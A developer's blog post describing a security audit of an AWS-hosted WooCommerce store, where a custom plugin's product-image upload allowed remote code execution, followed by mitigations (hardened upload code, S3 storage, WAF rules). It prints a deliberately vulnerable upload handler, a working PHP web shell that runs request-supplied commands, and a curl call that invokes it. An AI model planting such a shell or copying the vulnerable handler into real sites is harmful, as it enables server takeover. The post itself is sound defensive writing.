Vengala Vinay

Having 12+ Years of Experience in Software Development

Home » How We Audited a High-Traffic WooCommerce Enterprise Stack on AWS and Mitigated Remote Code Execution (RCE) via insecure file uploads

How We Audited a High-Traffic WooCommerce Enterprise Stack on AWS and Mitigated Remote Code Execution (RCE) via insecure file uploads

Initial Reconnaissance and Attack Surface Identification

Our engagement began with a deep dive into the existing infrastructure. The client operates a high-traffic WooCommerce store hosted on AWS, leveraging a complex stack including EC2 instances for web servers, RDS for the database, S3 for media storage, and CloudFront for CDN. The primary concern was a recent report of suspicious activity, hinting at potential unauthorized access. Our initial reconnaissance focused on identifying the attack surface, particularly areas prone to insecure direct object references (IDOR) and insecure file upload vulnerabilities, which are common vectors for Remote Code Execution (RCE) in web applications.

We started by mapping out the application’s entry points and critical functionalities. This involved reviewing the WooCommerce plugin’s core features, custom extensions, and any third-party integrations. Key areas of interest included:

  • User account management (registration, login, profile updates)
  • Product management (creation, editing, image uploads)
  • Order processing and checkout
  • Payment gateway integrations
  • Any custom API endpoints or AJAX handlers

A critical step was to understand the file upload mechanisms. WooCommerce, by default, handles product images and potentially other media. We needed to ascertain how these uploads were processed, validated, and stored. This involved static analysis of the WooCommerce core files and any custom theme/plugin code responsible for handling uploads.

Deep Dive into File Upload Vulnerabilities

The most promising avenue for RCE in this context was an insecure file upload vulnerability. We hypothesized that a lack of strict validation on uploaded file types, content, or execution permissions could allow an attacker to upload a malicious script (e.g., a PHP web shell) and then execute it. Our investigation focused on the following:

1. MIME Type and File Extension Validation

We examined the PHP code responsible for handling file uploads. A common pitfall is relying solely on client-side validation or weak server-side checks that can be bypassed. We looked for code snippets similar to this, which would be highly problematic:

(Hypothetical vulnerable code snippet)

// This is a simplified example of a VULNERABLE upload handler
if (isset($_FILES['user_avatar']) && $_FILES['user_avatar']['error'] == UPLOAD_ERR_OK) {
    $file_tmp = $_FILES['user_avatar']['tmp_name'];
    $file_name = basename($_FILES['user_avatar']['name']);
    $upload_dir = '/var/www/html/uploads/'; // Insecurely defined path

    // Extremely weak validation: only checks if it's an image based on extension
    $allowed_extensions = array('jpg', 'jpeg', 'png', 'gif');
    $file_ext = strtolower(pathinfo($file_name, PATHINFO_EXTENSION));

    if (in_array($file_ext, $allowed_extensions)) {
        // No check for actual MIME type or content
        // No sanitization of filename
        if (move_uploaded_file($file_tmp, $upload_dir . $file_name)) {
            echo "File uploaded successfully.";
        } else {
            echo "Error moving file.";
        }
    } else {
        echo "Invalid file extension.";
    }
}

The absence of server-side MIME type validation (using `finfo_file` or similar) and the reliance on just file extensions are major red flags. An attacker could rename a PHP web shell (e.g., `shell.php.jpg`) to bypass extension checks, or even upload a file with a double extension (e.g., `shell.php.jpg.png`).

2. Execution Context and Storage Location

Equally critical is where uploaded files are stored and whether that location is within the web server’s document root or a directory with execute permissions. If uploads land in a directory like `/var/www/html/uploads/` and that directory has execute permissions (or is part of a directory that does), uploading a file named `shell.php` would allow direct execution via a URL like `http://your-domain.com/uploads/shell.php`.

We also investigated if uploaded files were being served directly by the web server or through a more controlled mechanism (e.g., a PHP script that reads and outputs the file content, with strict checks). Serving directly from a user-writable directory is a significant risk.

3. Content Validation and Sanitization

Beyond extensions and MIME types, robust validation should inspect the file’s actual content. For images, this means verifying the file’s header and structure. For other file types, it might involve checking for malicious patterns or scripts embedded within the file. Filename sanitization is also crucial to prevent directory traversal attacks (e.g., `../../etc/passwd.php`).

Exploitation and Proof of Concept

Based on our analysis, we identified a specific custom plugin that handled product image uploads without adequate server-side validation. The plugin accepted any file type and stored it directly in a web-accessible directory (`wp-content/uploads/product_images/`).

We crafted a simple PHP web shell, named `backdoor.php`, containing basic commands to demonstrate execution:

<?php
// backdoor.php
// Basic web shell for PoC
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    die;
}
?>

We then attempted to upload this file through the product image upload form. The plugin, unfortunately, accepted it without complaint. After a successful upload, the file was accessible at a URL like `https://your-domain.com/wp-content/uploads/product_images/backdoor.php`.

To confirm RCE, we sent a request to the uploaded shell:

curl "https://your-domain.com/wp-content/uploads/product_images/backdoor.php?cmd=id"

The output confirmed successful command execution, showing the user ID under which the web server process was running (e.g., `uid=33(www-data) gid=33(www-data) groups=33(www-data)`). This proved a critical RCE vulnerability.

Mitigation Strategies and Implementation

Addressing this vulnerability required a multi-layered approach, focusing on immediate fixes and long-term hardening.

1. Immediate Patching of the Custom Plugin

The most direct fix was to modify the vulnerable custom plugin. We implemented strict server-side validation for all file uploads:

// Secure upload handler snippet
if (isset($_FILES['product_image']) && $_FILES['product_image']['error'] == UPLOAD_ERR_OK) {
    $file_tmp = $_FILES['product_image']['tmp_name'];
    $original_filename = $_FILES['product_image']['name'];
    $file_size = $_FILES['product_image']['size'];
    $file_mime_type = mime_content_type($file_tmp); // Server-side MIME type detection

    // Define allowed MIME types and extensions for product images
    $allowed_mime_types = array('image/jpeg', 'image/png', 'image/gif');
    $allowed_extensions = array('jpg', 'jpeg', 'png', 'gif');

    // Sanitize filename to prevent traversal and invalid characters
    $sanitized_filename = sanitize_file_name($original_filename);
    $file_ext = strtolower(pathinfo($sanitized_filename, PATHINFO_EXTENSION));

    // Check file size (e.g., max 5MB)
    $max_file_size = 5 * 1024 * 1024;

    if (!in_array($file_mime_type, $allowed_mime_types)) {
        wp_die("Error: Invalid file type. Only JPEG, PNG, and GIF are allowed.");
    }

    if (!in_array($file_ext, $allowed_extensions)) {
        wp_die("Error: Invalid file extension. Please use .jpg, .jpeg, .png, or .gif.");
    }

    if ($file_size > $max_file_size) {
        wp_die("Error: File size exceeds the maximum limit of 5MB.");
    }

    // Generate a unique filename to prevent overwrites and potential exploits
    $new_filename = wp_unique_filename(ABSPATH . 'wp-content/uploads/product_images/', $sanitized_filename);
    $target_path = ABSPATH . 'wp-content/uploads/product_images/' . $new_filename;

    // Ensure the upload directory exists and is writable
    if (!wp_mkdir_p(dirname($target_path))) {
        wp_die("Error: Could not create upload directory.");
    }

    if (move_uploaded_file($file_tmp, $target_path)) {
        // Store the new filename in the database
        // ... update product metadata ...
        echo "Product image uploaded successfully.";
    } else {
        wp_die("Error: Failed to move uploaded file.");
    }
}

Key improvements include:

  • Server-side MIME type validation using mime_content_type().
  • Strict checking against allowed MIME types and extensions.
  • Filename sanitization using WordPress’s sanitize_file_name().
  • File size limitation.
  • Using wp_unique_filename() to generate unique, safe filenames and prevent overwrites.
  • Ensuring the upload directory is created securely using wp_mkdir_p().

2. Reconfiguring Storage Location

The most secure practice is to store uploads outside the web server’s document root. For WordPress, this typically means moving uploads to a directory that is not directly accessible via HTTP. If direct access is required (e.g., for performance with CloudFront), a dedicated script should serve the files, performing authentication and authorization checks.

In this enterprise setup, we recommended leveraging AWS S3 for storing all user-uploaded content. This offers several advantages:

  • Decoupling: Uploads are no longer directly tied to the web server filesystem.
  • Security: S3 bucket policies can be configured to restrict direct public access, serving files only via authenticated requests or pre-signed URLs.
  • Scalability & Durability: S3 provides highly available and durable storage.
  • Performance: CloudFront can cache content directly from S3.

The implementation involved modifying the plugin to upload files directly to an S3 bucket using the AWS SDK for PHP. The upload process would then look conceptually like this:

// Conceptual S3 upload logic using AWS SDK for PHP
require 'vendor/autoload.php'; // Assuming Composer is used

use Aws\S3\S3Client;
use Aws\S3\Exception\S3Exception;

// ... (previous validation logic) ...

$s3Client = new S3Client([
    'version' => 'latest',
    'region'  => 'us-east-1', // Your AWS region
    'credentials' => [
        'key'    => 'YOUR_AWS_ACCESS_KEY_ID',
        'secret' => 'YOUR_AWS_SECRET_ACCESS_KEY',
    ]
]);

$bucket = 'your-secure-woocommerce-uploads-bucket';
$key = 'product_images/' . $new_filename; // Path within the bucket

try {
    $result = $s3Client->putObject([
        'Bucket' => $bucket,
        'Key'    => $key,
        'SourceFile' => $file_tmp,
        'ContentType' => $file_mime_type, // Set correct MIME type
        // Add ACL or other options as needed, e.g., 'ACL' => 'private'
    ]);

    // Store the S3 object URL or key in the database
    $s3_object_url = $result['ObjectURL'];
    // ... update product metadata with $s3_object_url ...

    echo "Product image uploaded successfully to S3.";

} catch (S3Exception $e) {
    wp_die("Error uploading file to S3: " . $e->getMessage());
}

Crucially, the S3 bucket should be configured with restrictive policies, disallowing direct public `GetObject` access. Instead, files would be served via CloudFront using Origin Access Identity (OAI) or Origin Access Control (OAC), or through pre-signed URLs generated by the application for authenticated users.

3. Web Application Firewall (WAF) Configuration

To provide an additional layer of defense, we reviewed and enhanced the AWS WAF rules protecting the CloudFront distribution. Specific rules were implemented to:

  • Block requests attempting to upload files with executable extensions (e.g., `.php`, `.phtml`, `.exe`).
  • Inspect request bodies for common web shell patterns or suspicious payloads.
  • Enforce strict MIME type validation at the edge for relevant endpoints.
  • Rate-limit suspicious IP addresses exhibiting brute-force or scanning behavior.

Example of a WAF rule logic (conceptual, actual implementation varies):

// Rule: Block executable file uploads
If Request.Method is POST
AND Request.URI contains "/wp-admin/admin-ajax.php" OR "/wp-content/plugins/vulnerable-plugin/"
AND Request.Body contains file upload parameters
AND (
    Request.Body.FileName matches regex "\.(php|phtml|exe|sh)$"
    OR Request.Body.ContentType matches "application/x-php"
)
Then Block

Post-Mitigation Verification and Ongoing Monitoring

After implementing the fixes, a thorough re-testing phase was conducted. We attempted to upload various malicious file types, including renamed web shells and files with double extensions, to ensure the new validation logic was robust. We also verified that legitimate image uploads still functioned correctly.

Ongoing monitoring is paramount. This includes:

  • Regularly reviewing AWS WAF logs for blocked malicious requests.
  • Monitoring S3 access logs for any unusual activity.
  • Implementing server-side intrusion detection systems (IDS) on EC2 instances.
  • Setting up alerts for critical security events (e.g., unexpected file modifications, high rates of failed uploads).
  • Conducting periodic security audits and penetration tests.

By combining secure coding practices, robust infrastructure configuration (especially leveraging AWS services like S3 and WAF), and continuous monitoring, we were able to effectively mitigate the RCE vulnerability and significantly enhance the overall security posture of the enterprise WooCommerce stack.

Recent Posts

Top Categories

Our Products

Our Services